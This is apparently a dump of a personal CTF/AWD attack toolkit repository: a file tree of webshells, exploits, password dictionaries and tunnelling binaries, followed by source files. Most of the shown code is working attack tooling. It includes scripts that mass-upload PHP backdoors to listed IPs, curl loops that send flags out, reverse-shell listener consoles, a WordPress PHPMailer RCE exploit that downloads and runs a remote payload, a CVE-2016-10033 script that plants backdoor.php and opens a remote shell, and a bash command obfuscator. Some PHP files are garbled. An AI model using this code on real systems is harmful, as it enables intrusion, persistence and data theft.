├── README.md ├── awd ├── autoexp.py ├── bak.sh ├── echo_shell_base64_code.php ├── flask_submit_flask.py ├── fuck.py ├── fuck_pc.py ├── fuck_wp_1.py ├── grep_audit.md ├── include.sh ├── kill_php_fpm.sh ├── nodieshell.php ├── s1.php ├── s1.sh ├── s2.php ├── s3.php ├── s4.php ├── shell.py ├── shell_manager.py ├── shellmanager.py ├── showflageveryphp.php ├── submitFlag.py ├── wordpress_exp.py └── wordpress_phpmailer_exploit.sh ├── coder ├── bashfuck.py └── jjdecode.py ├── crypto ├── base64.c └── base64_encode_custom_table.c ├── dict ├── dicts.py ├── dir │ ├── 5.php.txt │ ├── 8.py.txt │ ├── bak.txt │ ├── bbscandir.txt │ ├── dic.txt │ ├── raft-large-files.txt │ └── web-dir-list.txt ├── domain │ └── domain_default.csv.txt ├── password │ ├── 10_million_password_list_top_1000.txt │ ├── 10k_most_common.txt │ ├── 10top1K.txt │ ├── 12306-14W-top100.txt │ ├── 3389爆破字典.txt │ ├── 3389爆破给力字典字典.txt │ ├── 500-worst-passwords.txt │ ├── Defaultpass.txt │ ├── NT密码.txt │ ├── adobe100.txt │ ├── best1050.txt │ ├── john.txt │ ├── password.txt │ ├── passwords.txt │ ├── phpbb.txt │ ├── rockyou-20.txt │ ├── simple-pass.txt │ ├── ssh_password.txt │ ├── tianya-top-1w.txt │ ├── top100password.txt │ ├── top10k.txt │ ├── top500.txt │ ├── twitter.txt │ ├── unix_passwords.txt │ ├── usernames.txt │ ├── weaksauce.txt │ ├── wordlist.txt │ ├── 字典.txt │ ├── 常用密码.txt │ ├── 渗透字典.txt │ └── 自己收集的密码.txt ├── ssrf │ ├── config.dic │ ├── deal_log.py │ ├── lfi-scanner.dic │ ├── log.dic │ ├── proc.dic │ └── ssrf.dic ├── web │ ├── ASP.txt │ ├── ASPX.txt │ ├── DIR.txt │ ├── JSP.txt │ ├── MDB.txt │ └── PHP.txt ├── webshell │ ├── shellpassword.txt │ ├── webshellPassword.txt │ ├── webshell_password_no_name.txt │ ├── webshll木马常用密码.txt │ ├── webshll木马常用密码1.txt │ └── 收藏的后门密码.txt └── wifipass │ └── wifi_password_top_100.txt ├── exp ├── les.pl └── win │ ├── GetPass.zip │ ├── GetPassword_x64.zip │ ├── ms16-032.exe │ ├── ms16-032_x64.exe │ ├── pr.exe │ └── pr_3389.exe ├── flowscript ├── flow.php ├── index.php ├── phpflow.php ├── phpwaf.php └── waf.php ├── gen_xbin_avi.py ├── misc ├── Stegsolve.jar └── ZipCenOp.jar ├── other ├── py-server-cmd.txt └── test.py ├── proxy ├── Earthworm │ ├── Readme.txt │ ├── ew_for_Arm32 │ ├── ew_for_Linux32 │ ├── ew_for_MacOSX64 │ ├── ew_for_Win.exe │ ├── ew_for_linux64 │ └── ew_mipsel └── Termite │ ├── README.md │ ├── admin_MacOS_x64 │ ├── admin_linux_i586 │ ├── admin_linux_i686 │ ├── admin_linux_x86_64 │ ├── admin_win32.exe │ ├── agent_MacOS_x64 │ ├── agent_linux_armv4l │ ├── agent_linux_armv5l │ ├── agent_linux_i586 │ ├── agent_linux_i686 │ ├── agent_linux_m68k │ ├── agent_linux_mips │ ├── agent_linux_mipsel │ ├── agent_linux_powerpc │ ├── agent_linux_powerpc-440fp │ ├── agent_linux_sh4 │ ├── agent_linux_sparc │ ├── agent_linux_x86_64 │ └── agent_win32.exe ├── scripts ├── aes_decrypt.py ├── hashid.py ├── htpasswd.sh ├── iconv_gbk_to_utf8.sh ├── include_waf.sh ├── killphp.sh ├── python_tty.sh ├── reset_mysql_root_password.sh ├── rtcp.py ├── scanwebshell.py ├── shell_53_udp.py ├── socks5.py ├── xssget.php └── xxtea_decrypt.c ├── sh ├── clear_log.sh ├── echo.sh ├── ftpd.sh └── install_waf.sh ├── socksserver.py ├── tools ├── InsightScan.py ├── PaddingOracleAttack.py ├── Rescan.py ├── bash.py ├── cipher_identify.py ├── drcom │ ├── Decipher.class │ ├── Decipher.java │ └── Decipher.py ├── elasticsearch.py ├── ftp.py ├── google.py ├── iis_shortname_Scan.py ├── ip.py ├── jinzhi.py ├── md5_collision_bin │ ├── exp.py │ ├── message1.bin │ └── message2.bin ├── mongdb.py ├── php.py ├── php_images_webshell_jpg.php ├── php_mt_seed-3.2.tar.gz ├── png_create.php ├── png_test.py ├── portscan.py ├── portscan2.py ├── portscan3.py ├── portscan4.py ├── post_upload.py ├── privdns.py ├── random_string.py ├── rebuild_png.py ├── redis.py ├── redis_ssh.sh ├── reverse-shell.pl ├── rexp.py ├── rip-hg.pl ├── rip-svn.pl ├── rtcp.py ├── runmd5.py ├── shell_53_udp.py ├── socket_shell.py ├── socket_shell_bash_py.sh ├── socks5.py ├── sqlin.py ├── ssltest.py ├── ssrf.py ├── tarfile.py ├── urllibreq.py └── vi_vim_scan_and_download.py ├── webshell ├── asp │ ├── ice.asp │ └── wumi.asp ├── c │ └── cmd.c ├── jsp │ ├── CmdServlet.class │ ├── CmdServlet.java │ ├── ListServlet.class │ ├── ListServlet.java │ ├── UpServlet.class │ ├── UpServlet.java │ ├── cmd.jsp │ ├── sll.jsp │ └── up.jsp ├── php │ ├── cmd.php │ ├── list.php │ ├── supershell.php │ └── up.php ├── pl-cgi │ ├── cmd.pl │ ├── list.pl │ └── up.pl ├── servlet │ ├── CmdServlet.java │ ├── ListServlet.java │ └── UpServlet.java └── sh │ ├── cmd.sh │ ├── list.sh │ └── up.sh └── wrapper ├── Makefile ├── hook.c ├── wrapper_pipe.c └── wrapper_socket.c /README.md: -------------------------------------------------------------------------------- 1 | # vFuckingTools 2 | 3 | A CTFer tools bag by myself 4 | 5 | ## 难受 6 | 7 | 整理的时候执行了 8 | 9 | `find . -type f | grep ".\!*" | xargs rm` 10 | 11 | 于是就悲剧了,,,, -------------------------------------------------------------------------------- /awd/bak.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z $1 ];then 3 | echo './bak.sh webroot' 4 | else 5 | echo "WWWROOT : $1" 6 | tar -zcvf /tmp/webbak_`basename $1`_`date|md5 -q`.tar.gz $1 7 | echo "Backup : /tmp/webbak_`basename $1`_`date|md5 -q`.tar.gz" 8 | fi 9 | -------------------------------------------------------------------------------- /awd/echo_shell_base64_code.php: -------------------------------------------------------------------------------- 1 | ', 54 | 'dosubmit': '1', 55 | } 56 | rep = requests.post(u, data=data) 57 | print(rep.content) 58 | shell = '' 59 | re_result = re.findall(r'<img src=(.*)>', rep.content) 60 | if len(re_result): 61 | shell = re_result[0] 62 | return shell 63 | 64 | 65 | def submit(flag, ip): 66 | headers = { 67 | "Cookie": "SSCSum=14; zlms-sid=uh8kbtd9jrki9ch4jo7qfnpnt0; webcs_test_cookie=lms_cookie_checker; lms_login_name=HZ9; PHPSESSID=jq11tlbp5kuvtk49h94r6b1ap2" 68 | } 69 | data = { 70 | "melee_flag": flag, 71 | "melee_ip": ip 72 | } 73 | res = requests.post(SUBMIT_URL, data=data, headers=headers, timeout=5) 74 | if res.status_code == 200: 75 | # print res.content 76 | html = res.content 77 | print html[-200:] 78 | if '您已提交过当前IP和FLAG' in html: 79 | print '您已提交过当前IP和FLAG' 80 | elif '恭喜您答对了' in html: 81 | print '恭喜您答对了' 82 | 83 | if __name__ == '__main__': 84 | # while True: 85 | for shell in SHELLS: 86 | print shell 87 | try: 88 | flag = poc_eval_backdoor_getflag_1(shell) 89 | if flag: 90 | print flag 91 | flag = flag.strip().replace('\r', '').replace('\n', '') 92 | print shell[7:21], flag 93 | submit(flag, shell[7:21]) 94 | time.sleep(15) 95 | except Exception, e: 96 | print e 97 | pass 98 | print 'Waiting...' 99 | # time.sleep(60 * 10) 100 | -------------------------------------------------------------------------------- /awd/fuck_wp_1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding:utf-8 3 | import requests 4 | import re 5 | import time 6 | 7 | req = None 8 | 9 | TOKEN = "" 10 | SUBMIT_URL = "http://192.168.80.1/lms/portal/sp/hz_flag.php" 11 | SUBMIT_U = "" 12 | SUBMIT_P = "" 13 | 14 | URLS = ['172.20.101.101', 15 | '172.20.102.101', 16 | '172.20.103.101', 17 | # '172.20.104.101', 18 | '172.20.105.101', 19 | '172.20.106.101', 20 | '172.20.107.101', 21 | '172.20.108.101' 22 | ] 23 | URLS2 = ['172.20.101.103', 24 | '172.20.102.103', 25 | '172.20.103.103', 26 | # '172.20.104.103', 27 | '172.20.105.103', 28 | '172.20.106.103', 29 | '172.20.107.103', 30 | '172.20.108.103' 31 | ] 32 | 33 | 34 | def poc_eval_backdoor_getflag_1(shellurl, p, code): 35 | data = { 36 | p: code 37 | } 38 | try: 39 | res = requests.post(shellurl, data=data, timeout=5) 40 | if res.status_code == 200: 41 | return res.content 42 | except Exception, e: 43 | print e 44 | 45 | 46 | def poc_phpcms_reg_shell(url): 47 | u = 'http://{}/phpcms/index.php?m=member&c=index&a=register&siteid=1'.format( 48 | url) 49 | data = { 50 | 'siteid': '1', 51 | 'modelid': '1', 52 | 'username': 'test', 53 | 'password': 'testxx', 54 | 'email': 'test@test.com', 55 | 'info[content]': '', 56 | 'dosubmit': '1', 57 | } 58 | rep = requests.post(u, data=data) 59 | print(rep.content) 60 | shell = '' 61 | re_result = re.findall(r'<img src=(.*)>', rep.content) 62 | if len(re_result): 63 | shell = re_result[0] 64 | print url, shell 65 | return shell 66 | 67 | 68 | def submit(flag, ip): 69 | headers = { 70 | "Cookie": "SSCSum=14; zlms-sid=uh8kbtd9jrki9ch4jo7qfnpnt0; webcs_test_cookie=lms_cookie_checker; lms_login_name=HZ9; PHPSESSID=jq11tlbp5kuvtk49h94r6b1ap2" 71 | } 72 | data = { 73 | "melee_flag": flag, 74 | "melee_ip": ip 75 | } 76 | res = requests.post(SUBMIT_URL, data=data, headers=headers, timeout=5) 77 | if res.status_code == 200: 78 | # print res.content 79 | html = res.content 80 | print html[-200:] 81 | if '您已提交过当前IP和FLAG' in html: 82 | print '您已提交过当前IP和FLAG' 83 | elif '恭喜您答对了' in html: 84 | print '恭喜您答对了' 85 | 86 | 87 | def fuck_1(): 88 | req = requests.session() 89 | for ip in URLS: 90 | try: 91 | su = 'http://{}/wp-content/plugins/mailpress/uninstall.php'.format( 92 | ip) 93 | flag = poc_eval_backdoor_getflag_1( 94 | su, "525", "echo file_get_contents('/flag.txt');") 95 | if flag: 96 | flag = flag.strip().replace('\r', '').replace('\n', '') 97 | print ip, flag 98 | submit(flag, ip) 99 | time.sleep(15) 100 | except Exception, e: 101 | print e 102 | 103 | 104 | def test(): 105 | for ip in URLS: 106 | # su = 'http://{}/wp-content/plugins/mailpress/uninstall.php'.format( 107 | # ip) 108 | custom_shell_add_shell(ip) 109 | # flag = poc_eval_backdoor_getflag_1( 110 | # su, "525", "echo file_get_contents('/flag.txt');") 111 | print ip 112 | 113 | 114 | if __name__ == '__main__': 115 | fuck_1() 116 | # while True: 117 | # fuck_1() 118 | # print 'Waiting...' 119 | # time.sleep(60 * 20) 120 | # poc_phpcms_reg_shell('172.20.102.103') 121 | # for ip in URLS2: 122 | # poc_phpcms_reg_shell(ip) 123 | -------------------------------------------------------------------------------- /awd/grep_audit.md: -------------------------------------------------------------------------------- 1 | grep -i -r "\$_GET" /path 2 | grep -i -r "\$_GET" |grep eval 3 | grep -i -r "\$_GET" |grep assert 4 | grep -i -r "\$_GET" |grep system 5 | grep -i -r "\$_GET" |grep call_user 6 | grep -i -r "\$_GET" |grep eval_r 7 | grep -i -r "\$_GET" |grep preg_replace 8 | grep -i -r "\$_GET" |grep exec -------------------------------------------------------------------------------- /awd/include.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | for file in $(find . -name '*.php');do 3 | sed -i "2c 4 | require_once('/usr/share/nginx/html/WordPress/phpwaf.php');" $file; 5 | done 6 | -------------------------------------------------------------------------------- /awd/kill_php_fpm.sh: -------------------------------------------------------------------------------- 1 | ps -ed | grep 'php-fpm' | awk '{print $1}' | xargs kill -9 2 | 3 | 4 | ps -ed | grep 'sshd' | awk '{print $1}' | xargs kill -9 5 | 6 | 7 | -------------------------------------------------------------------------------- /awd/nodieshell.php: -------------------------------------------------------------------------------- 1 | /dev/null"); 8 | } -------------------------------------------------------------------------------- /awd/s1.php: -------------------------------------------------------------------------------- 1 | \r\n'.file_get_contents($afile)); 11 | } 12 | } 13 | getfiles('/var/www/html'); 14 | 15 | ?> -------------------------------------------------------------------------------- /awd/s1.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/sh 2 | while true 3 | do 4 | curl -d "flag=${`cat flag`}" "http://{IP}/g.php" 5 | sleep 1*60*10 6 | done -------------------------------------------------------------------------------- /awd/s2.php: -------------------------------------------------------------------------------- 1 | '); 6 | function getfiles($path){ 7 | foreach(glob($path) as $afile){ 8 | if(is_dir($afile)){ 9 | getfiles($afile.'/*.php'); 10 | }else{ 11 | file_put_contents($afile,''.file_get_contents($afile), FILE_APPEND); 12 | } 13 | } 14 | } 15 | while(1){ 16 | getfiles($_SERVER['DOCUMENT_ROOT']); 17 | } 18 | ?> -------------------------------------------------------------------------------- /awd/s3.php: -------------------------------------------------------------------------------- 1 | '); 6 | function getfiles($path){ 7 | foreach(glob($path) as $afile){ 8 | if(is_dir($afile)){ 9 | getfiles($afile.'/*.php'); 10 | }else{ 11 | file_put_contents($afile,''); 12 | } 13 | } 14 | } 15 | while(1){ 16 | getfiles($_SERVER['DOCUMENT_ROOT']); 17 | } 18 | ?> -------------------------------------------------------------------------------- /awd/s4.php: -------------------------------------------------------------------------------- 1 | '); 6 | $bash =<< /dev/null'); 16 | 17 | while(1){ 18 | getfiles($_SERVER['DOCUMENT_ROOT']); 19 | } 20 | ?> -------------------------------------------------------------------------------- /awd/shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import requests 3 | import random 4 | 5 | ip_pass = {} 6 | shell_pass = [] 7 | 8 | shell_address = '/WordPress/shell.php' 9 | 10 | ips = ['40.10.10.57', 11 | '40.10.10.26', 12 | '40.10.10.11', 13 | '40.10.10.62', 14 | '40.10.10.24', 15 | '40.10.10.59', 16 | '40.10.10.47', 17 | '40.10.10.42', 18 | '40.10.10.15', 19 | ] 20 | 21 | 22 | def get_shell(file): 23 | return open(file).read() 24 | 25 | 26 | def random_str(randomlength=6): 27 | str = '' 28 | chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789' 29 | length = len(chars) - 1 30 | for i in range(randomlength): 31 | str += chars[random.randint(0, length)] 32 | return str 33 | 34 | 35 | def fuck(ip, password): 36 | global filepath 37 | # payload = % password 38 | payload = get_shell('s4.php') 39 | payload = payload.replace('passwordpassword', password).replace( 40 | '', '').replace('filepathfilepath', filepath) 41 | try: 42 | ip_pass[ip] = password 43 | data = {'1': payload} 44 | r = requests.post('http://' + ip + shell_address, data=data, timeout=3) 45 | if r.status_code == '200': 46 | print(ip + 'shell exist') 47 | ip_pass[ip] = password 48 | except requests.exceptions.ReadTimeout, e: 49 | print('except : ' + e) 50 | pass 51 | 52 | if __name__ == '__main__': 53 | filepath = '' 54 | for ip in ips: 55 | password = random_str() 56 | fuck(ip, password) 57 | -------------------------------------------------------------------------------- /awd/shell_manager.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import SocketServer 5 | import threading 6 | import socket 7 | 8 | HOST = '0.0.0.0' 9 | PORT = 9999 10 | BUFSIZE = 1024 * 4 11 | 12 | CLIENTS = [] 13 | 14 | 15 | class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler): 16 | 17 | def setup(self): 18 | # print(self.client_address) 19 | CLIENTS.append({self.client_address[0]: self.request}) 20 | 21 | def handle(self): 22 | data = self.request.recv(BUFSIZE) 23 | cur_thread = threading.current_thread() 24 | # response = "{}: {}".format(cur_thread.name, data) 25 | print(data) 26 | print("\n") 27 | # self.request.sendall(response) 28 | 29 | def finish(self): 30 | print("finish\n") 31 | # print(self.client_address[0] + "\n") 32 | 33 | 34 | class MyThreadingTCPServer(SocketServer.ThreadingTCPServer): 35 | 36 | def __init__(self, server_address, RequestHandlerClass): 37 | SocketServer.ThreadingTCPServer.__init__( 38 | self, server_address, RequestHandlerClass) 39 | self.request_queue_size = 200 40 | self.socket_type = socket.SOCK_STREAM 41 | 42 | 43 | if __name__ == '__main__': 44 | server = MyThreadingTCPServer( 45 | (HOST, PORT), ThreadedTCPRequestHandler) 46 | try: 47 | st = threading.Thread(target=server.serve_forever) 48 | st.daemon = True 49 | st.start() 50 | print "Server loop running in thread:", st.name 51 | cmd = raw_input("cmd > ") 52 | while cmd: 53 | if cmd == 'ls': 54 | print("ls\n") 55 | for i in range(1, len(CLIENTS) + 1): 56 | print("%d\t%s" % (i, CLIENTS[i - 1])) 57 | elif cmd[:4] == 'fuck': 58 | cid = int(cmd[4:]) 59 | if not cid: 60 | print("fuck [num]") 61 | if CLIENTS[cid - 1]: 62 | print(CLIENTS[cid - 1]) 63 | print("client %s >\n" % CLIENTS[cid - 1][1]) 64 | client = CLIENTS[cid - 1][CLIENTS[cid - 1].keys()[0]] 65 | ccmd = raw_input("client > ") 66 | while ccmd: 67 | if ccmd == "vquit": 68 | break 69 | client.sendall(ccmd) 70 | ccmd = raw_input("client > ") 71 | elif cmd == 'exit': 72 | server.shutdown() 73 | server.server_close() 74 | break 75 | elif cmd[:4] == 'eval': 76 | eval(cmd[4:]) 77 | else: 78 | print("Error cmd : %s" % cmd) 79 | cmd = raw_input("cmd > ") 80 | except KeyboardInterrupt: 81 | print("^C") 82 | server.shutdown() 83 | server.server_close() 84 | except Exception as e: 85 | print(e) 86 | # try: 87 | # cmd = raw_input("cmd > ") 88 | # while cmd: 89 | # if cmd == 'ls': 90 | # print("ls\n") 91 | # for i in CLIENTS: 92 | # print("\t%s" % i) 93 | # elif cmd == 'exit': 94 | # print("exit\n") 95 | # STOP = True 96 | # sys.exit(0) 97 | # else: 98 | # print("Error cmd : %s" % cmd) 99 | # cmd = raw_input("cmd > ") 100 | # except KeyboardInterrupt: 101 | # sys.exit(0) 102 | -------------------------------------------------------------------------------- /awd/shellmanager.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import socket 5 | import sys 6 | import threading 7 | import time 8 | import random 9 | 10 | HOST = '0.0.0.0' 11 | PORT = 23333 12 | BUFSIZE = 1024 * 8 13 | 14 | VER = sys.version_info.major 15 | 16 | if VER == 3: 17 | raw_input = input 18 | 19 | 20 | class Reader(threading.Thread): 21 | 22 | def __init__(self, client): 23 | threading.Thread.__init__(self) 24 | self.client = client 25 | self.stop = False 26 | 27 | def run(self): 28 | while not self.stop: 29 | data = self.client.recv(BUFSIZE) 30 | if data: 31 | print(data) 32 | time.sleep(1) 33 | continue 34 | 35 | def cmd(self, cmd): 36 | self.client.sendall(cmd) 37 | 38 | def stop(self): 39 | self.stop = True 40 | 41 | x = { 42 | "127.0.0.1": { 43 | "port": "c" 44 | } 45 | } 46 | 47 | 48 | class Listener(threading.Thread): 49 | 50 | def __init__(self, port): 51 | threading.Thread.__init__(self) 52 | self.clients = {} 53 | self.stop = False 54 | self.port = port 55 | self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 56 | self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 57 | self.sock.bind((HOST, port)) 58 | self.sock.listen(1) 59 | 60 | def run(self): 61 | print("listener started %s\n" % self.port) 62 | while not self.stop: 63 | client, cltadd = self.sock.accept() 64 | t = Reader(client) 65 | c_host = str(client.getpeername()[0]) 66 | c_port = client.getpeername()[1] 67 | if c_host not in self.clients: 68 | self.clients.update({c_host: {c_port: t}}) 69 | else: 70 | self.clients[c_host].update({c_port: t}) 71 | t.start() 72 | 73 | def stop(self): 74 | for i in self.clients: 75 | self.clients[i][1].stop() 76 | self.stop = True 77 | 78 | 79 | def cmd(lst): 80 | cmd = raw_input("cmd > ") 81 | while True: 82 | try: 83 | if cmd == 'ls': 84 | for k_host in lst.clients: 85 | print(">> %s\n" % (k_host)) 86 | for k_port in lst.clients[k_host]: 87 | print(">>>> %s -> %s\n" % 88 | (k_port, lst.clients[k_host][k_port])) 89 | elif cmd[:4] == 'fuck': 90 | cc = cmd[5:].strip() 91 | cc = cc.split(":") 92 | host = cc[0] 93 | port = cc[1] 94 | if host and lst.clients[host]: 95 | client = lst.clients[host][port] 96 | pt = "client %s:%d >>" % (host, port) 97 | ccmd = raw_input(pt) 98 | while ccmd: 99 | if ccmd == "vquit" or ccmd == "vq": 100 | break 101 | client.sendall(ccmd + "\n") 102 | ccmd = "" 103 | ccmd = raw_input(pt) 104 | elif cmd == 'exit': 105 | lst.stop() 106 | break 107 | elif cmd[:4] == 'eval': 108 | eval(cmd[4:]) 109 | else: 110 | print("cmd :\n\tls\n\tfuck [n]\n\texit") 111 | # TODO test-live 112 | cmd = raw_input("cmd > ") 113 | except Exception as e: 114 | print(e) 115 | 116 | if __name__ == '__main__': 117 | lst = Listener(PORT) 118 | lst.daemon = True 119 | lst.start() 120 | cmd(lst) 121 | -------------------------------------------------------------------------------- /awd/showflageveryphp.php: -------------------------------------------------------------------------------- 1 | >>".file_get_content("/pathflagpathflag")."<<<";?>',FILE_APPEND); 11 | } 12 | } 13 | getfiles('/var/www/html'); 14 | ?> -------------------------------------------------------------------------------- /awd/submitFlag.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # @Date : 2018-08-10 13:04:42 4 | # @Author : Virink (virink@outlook.com) 5 | # @Link : https://www.virzz.com 6 | # @Version : $Id$ 7 | 8 | import os 9 | import requests as req 10 | 11 | URL = "" 12 | 13 | 14 | def submit(flag): 15 | data = { 16 | "flag": flag 17 | } 18 | res = req.post(URL, data) 19 | if res.status_code == 200: 20 | return True 21 | else: 22 | return False 23 | 24 | if __name__ == '__main__': 25 | flag = "flag{test]" 26 | res = submit(flag) 27 | print(res) 28 | -------------------------------------------------------------------------------- /awd/wordpress_exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import requests 3 | import sys 4 | 5 | # wordpress's url 6 | target = 'http://127.0.0.1' if not sys.argv[1] else sys.argv[1] 7 | # Put your command in a website, and use the website's url 8 | # don't contains "http://", must be all lowercase 9 | shell_url = 'example.com/1.txt' if not sys.argv[2] else sys.argv[2] 10 | # an exists user 11 | user = 'admin' 12 | 13 | def generate_command(command): 14 | command = '${run{%s}}' % command 15 | command = command.replace('/', '${substr{0}{1}{$spool_directory}}') 16 | command = command.replace(' ', '${substr{10}{1}{$tod_log}}') 17 | return 'target(any -froot@localhost -be %s null)' % command 18 | 19 | 20 | data = { 21 | 'user_login': user, 22 | 'redirect_to': '', 23 | 'wp-submit': 'Get New Password' 24 | } 25 | headers = { 26 | 'Host': generate_command('/usr/bin/curl -o/tmp/rce ' + shell_url), 27 | 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' 28 | } 29 | proxies = { 30 | 'http': 'http://127.0.0.1:8080' 31 | } 32 | target += '/wp-login.php?action=lostpassword' 33 | requests.post(target, headers=headers, data=data, proxies=proxies, allow_redirects=False) 34 | headers['Host'] = generate_command('/bin/bash /tmp/rce') 35 | requests.post(target, headers=headers, data=data, proxies=proxies, allow_redirects=False) -------------------------------------------------------------------------------- /awd/wordpress_phpmailer_exploit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # CVE-2016-10033 exploit by opsxcq 3 | # https://github.com/opsxcq/exploit-CVE-2016-10033 4 | 5 | echo '[+] CVE-2016-10033 exploit by opsxcq' 6 | 7 | if [ -z "$1" ] 8 | then 9 | echo '[-] Please inform an host as parameter' 10 | exit -1 11 | fi 12 | 13 | if [ $(uname) == 'Darwin' ] 14 | then 15 | decoder='base64 -D' 16 | elif [ $(uname) == 'Linux' ] 17 | then 18 | decoder='base64 -d' 19 | else 20 | echo '[-] Your platform isnt supported: '$(uname) 21 | exit -1 22 | fi 23 | 24 | 25 | host=$1 26 | 27 | echo '[+] Exploiting '$host 28 | 29 | curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\n\"vulnerables\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @test.com\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php' 30 | 31 | 32 | echo '[+] Checking if the backdoor was created on target system' 33 | code=$(curl -o /dev/null --silent --head --write-out '%{http_code}\n' "http://$host/backdoor.php") 34 | 35 | if [ "$code" != "200" ] 36 | then 37 | echo '[-] Target cant be exploited' 38 | exit -1 39 | else 40 | echo '[+] Backdoor.php found on remote system' 41 | fi 42 | 43 | cmd='whoami' 44 | while [ "$cmd" != 'exit' ] 45 | do 46 | echo '[+] Running '$cmd 47 | if ! curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | grep -v 'base64_encode' | head -n 1 | cut -d '|' -f 2 | $decoder 48 | then 49 | echo '[-] Connection problens' 50 | exit -1 51 | fi 52 | echo 53 | read -p 'RemoteShell> ' cmd 54 | done 55 | echo '[+] Exiting' 56 | -------------------------------------------------------------------------------- /coder/bashfuck.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import sys 5 | import os 6 | from pwn import * 7 | import argparse 8 | 9 | """ 10 | 0xddaa 11 | https://github.com/0xddaa/bashfuck 12 | encode a bash command with charset $, (, ), #, !, {, }, <, \, '. 13 | """ 14 | 15 | n = dict() 16 | n[0] = '$#' 17 | n[1] = '${##}' 18 | n[2] = '$(({n1}<<{n1}))'.format(n1=n[1]) 19 | n[3] = '$(({n2}#{n1}{n1}))'.format(n2=n[2], n1=n[1]) 20 | n[4] = '$(({n2}#{n1}{n0}{n0}))'.format(n2=n[2], n1=n[1], n0=n[0]) 21 | n[5] = '$(({n2}#{n1}{n0}{n1}))'.format(n2=n[2], n1=n[1], n0=n[0]) 22 | n[6] = '$(({n2}#{n1}{n1}{n0}))'.format(n2=n[2], n1=n[1], n0=n[0]) 23 | n[7] = '$(({n2}#{n1}{n1}{n1}))'.format(n2=n[2], n1=n[1]) 24 | 25 | 26 | def split(cmd): 27 | argv = [] 28 | token = '' 29 | quote = False 30 | for c in cmd: 31 | if c == ' ' and not quote: 32 | argv.append(token) 33 | token = '' 34 | elif c == '\'': 35 | quote = not quote 36 | else: 37 | token += c 38 | argv.append(token) 39 | return argv 40 | 41 | 42 | def str_to_oct(cmd): 43 | s = "$\\'" 44 | for _ in cmd: 45 | o = ('%s' % (oct(ord(_)).lstrip('0'))).rjust(3, '0') 46 | e = '\\\\' + ''.join(n[int(d)] for d in o) 47 | s += e 48 | s += "\\'" 49 | return s 50 | 51 | 52 | def arg_to_cmd(arg): 53 | cmd = '{' 54 | cmd += ','.join(str_to_oct(_) for _ in arg) 55 | cmd += ',}' 56 | return cmd 57 | 58 | 59 | def encode(cmd): 60 | log.info('cmd: `{}`'.format(cmd)) 61 | bash = '${!#}' 62 | cmd = "bash -c '{}'".format(cmd) 63 | exp = "%s<<<%s" % (bash, arg_to_cmd(split(cmd))) 64 | log.info('result ({} byte): {}'.format(len(exp), exp)) 65 | return exp 66 | 67 | 68 | def execute(bashfuck): 69 | with context.local(log_level='ERROR'): 70 | r = process('/bin/bash') 71 | r.sendline(bashfuck) 72 | r.sendline('echo GGGGGGGG; exit') 73 | log.info(r.recvuntil('GGGGGGGG', drop=True).strip()) 74 | with context.local(log_level='ERROR'): 75 | r.close() 76 | 77 | 78 | if __name__ == '__main__': 79 | parser = argparse.ArgumentParser(prog=sys.argv[0], 80 | description="encode a bash command with charset $,(,),#,!,{,},<,\\,'") 81 | parser.add_argument('cmd') 82 | parser.add_argument('-t', '--test', action='store_true', 83 | help='test bashfuck and output result') 84 | args = parser.parse_args() 85 | 86 | if args.test: 87 | execute(encode(args.cmd)) 88 | else: 89 | encode(args.cmd) 90 | -------------------------------------------------------------------------------- /crypto/base64_encode_custom_table.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // const char * base64Table = "BADCFEHGIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 5 | 6 | const char * base64Table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 7 | 8 | char * base64_encode(const unsigned char * bindata, char * base64, int binlength) 9 | { 10 | int i, j; 11 | unsigned char current; 12 | 13 | for (i = 0, j = 0; i < binlength; i += 3) 14 | { 15 | current = (bindata[i] >> 2); 16 | current &= (unsigned char)0x3F; 17 | base64[j++] = base64Table[(int)current]; 18 | 19 | current = ((unsigned char)(bindata[i] << 4)) & ((unsigned char)0x30); 20 | if (i + 1 >= binlength) 21 | { 22 | base64[j++] = base64Table[(int)current]; 23 | base64[j++] = '='; 24 | base64[j++] = '='; 25 | break; 26 | } 27 | current |= ((unsigned char)(bindata[i + 1] >> 4)) & ((unsigned char)0x0F); 28 | base64[j++] = 